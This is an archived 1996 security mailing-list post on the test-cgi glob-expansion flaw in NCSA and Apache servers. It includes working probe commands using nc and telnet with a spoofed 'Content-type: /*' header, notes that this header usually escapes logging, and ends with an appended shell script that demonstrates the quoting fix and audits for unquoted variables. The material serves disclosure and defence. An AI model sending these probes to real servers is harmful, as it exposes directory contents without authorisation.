[3569] in WWW Security List Archive
Re: test-cgi
daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Sun Nov 17 11:47:12 1996
From: htorgema@novice.uwaterloo.ca
Date: Sun, 17 Nov 1996 08:58:56 -0500 (EST)
To: "John Q. Public" <scwild@ix.netcom.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <328E0272.6ABF@ix.netcom.com>
Errors-To: owner-www-security@ns2.rutgers.edu
On Sat, 16 Nov 1996, John Q. Public warned:
> >>> The following text is available on many sites on the net.
>
> The quick fix is to place loose quotes around all of the
> variables in the test-cgi file (they should have been there
> from the beginning!).
>
> echo QUERY_STRING = "$QUERY_STRING"
>
> This incorrect file has been seen in at least several versions
> of NCSA, and Apache.
Some versions of NCSA and Apache have corrected the QUERY_STRING line, but
not the CONTENT_TYPE or the CONTENT_LENGTH line, while this data can be
easily spoofed (see example below).
In fact, the CONTENT_TYPE line is potentially more 'dangerous' than the
QUERY_STRING line because usually, http daemons don't log this field.
> Example exploit:
>
> machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
or:
machine% telnet www.host.com 80
GET /cgi-bin/test-cgi HTTP/1.0
Content-type: /*
<Cgi output displayed here>
---------------
Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
Never let your sense of morals prevent you from doing what is right.
-- Salvor Hardin, "Foundation"
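The quoting fix discussed in this thread, as an added example that is neither the NCSA/Apache test-cgi script nor code from the poster: the unquoted and quoted echo side by side with a glob-shaped header value, plus a heuristic check for echo lines still left unquoted (the CONTENT_TYPE/CONTENT_LENGTH case above). Function names and all inputs are assumptions constructed for the demo.

```shell
#!/bin/sh
# Added example, not the NCSA/Apache test-cgi script itself. It shows why
# an unquoted variable in a shell CGI script turns a client-supplied header
# into a directory listing, why the quoted form does not, and a small
# heuristic audit for lines that still expand a variable unquoted.
# All inputs are constructed locally; nothing is sent to any server.

# Vulnerable form (as in the unfixed test-cgi): the shell word-splits and
# glob-expands $CONTENT_TYPE, so a value shaped like '/*' is replaced by
# the names of every entry in that directory before echo ever runs.
unquoted_echo() {
    echo CONTENT_TYPE = $CONTENT_TYPE
}

# Hardened form: double quotes make the value one literal word, so the
# client-supplied string is echoed back exactly as received.
quoted_echo() {
    echo CONTENT_TYPE = "$CONTENT_TYPE"
}

# Heuristic audit: strip every "$VAR" that is already double-quoted, then
# report any remaining $VAR with its line number. Catches the case from the
# list post where QUERY_STRING was fixed but CONTENT_TYPE/CONTENT_LENGTH
# were not. (Does not understand ${VAR} or single-quoted text.)
unquoted_vars() {
    sed -E 's/"\$[A-Za-z_][A-Za-z0-9_]*"//g' "$1" |
        grep -nE '\$[A-Za-z_][A-Za-z0-9_]*' || true
}

# Stand-alone demo with a constructed directory and a constructed script.
demo() {
    dir=$(mktemp -d)
    touch "$dir/a.txt" "$dir/b.txt"
    CONTENT_TYPE="$dir/*"; export CONTENT_TYPE
    echo "unquoted: $(unquoted_echo)"
    echo "quoted:   $(quoted_echo)"
    script="$dir/test-cgi"
    printf '%s\n' 'echo QUERY_STRING = "$QUERY_STRING"' \
        'echo CONTENT_TYPE = $CONTENT_TYPE' \
        'echo CONTENT_LENGTH = $CONTENT_LENGTH' > "$script"
    echo "still unquoted:"
    unquoted_vars "$script"
    rm -rf "$dir"
}

demo
```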